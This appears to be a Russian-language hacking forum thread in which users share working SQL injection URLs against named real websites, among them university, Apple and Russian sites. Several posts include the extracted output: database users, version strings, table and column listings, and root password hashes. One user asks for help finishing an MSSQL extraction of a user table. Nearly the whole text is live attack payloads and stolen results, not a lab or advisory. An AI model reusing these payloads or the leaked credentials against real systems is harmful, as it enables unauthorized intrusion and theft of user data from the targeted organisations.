Получите - распишитесь Code: http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,3,4,concat_ws(char(58),username,password,salt,email,icq,skype)+from+vbuser/*
Вот пароль Code: http://www.buybrand.ru/rus/index/news?id=-1%20union%20select%201,2,name,4,5,passw,7,8+from%20users/*
первые два связаны с la2 http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/* http://www.akatsuki.asturservers.com/open-L2DP/item.php?id=-1+Union+select+1,2,3,TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+LIMIT+2,1/* http://www.books.bg/Item.php?id=-1+union+select+user()/*
Code: http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,concat_ws(0x203a20,user,password),3,4,5+from+mysql.user/* root : 1be122933e65c0f2 ;-)
Дык http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,concat(login_user,0x3a,password_user),8,9,10+from+user/*
Code: http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user/* [email protected]:bugs:5.0.18-log Code: http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,db),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.db/* есть база даных; asystem Code: http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/* root:*97EB633C4A82BD6AE86EB0CA129D2CD0CBF93228
Y.Dmitriy, limit поюзай и все будет открываться Code: http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,login,9,10+from+users+limit+2,1/*[code]
Сайтег Гарварда... Code: http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/* facdir@localhost: academics
http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15/* вот подобрал колонки!
http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12+from+information_schema.columns/*/
http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/* http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/* P.S.: как можно обойти это: Code: http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*
MsSql: http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@version-- http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+db_name())-- http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+system_user)-- Таблицы: D99_Tmp Category D99_CMD Dic_BodyPart Dic_HX Dic_Language Dic_State Dic_Test dtproperties ip Message Rights Role SessionAction SessionLog Siwebtmp Subscriber sysconstraints syssegments systables User v_Category v_Rights v_SessionActions Нашел все колонки в таблице User: ID RoleRef System Name Password FirstName LastName EMail Не получилось последнее: Code: http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)-- Как реализовать?
Code: http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.columns/*&mid=796
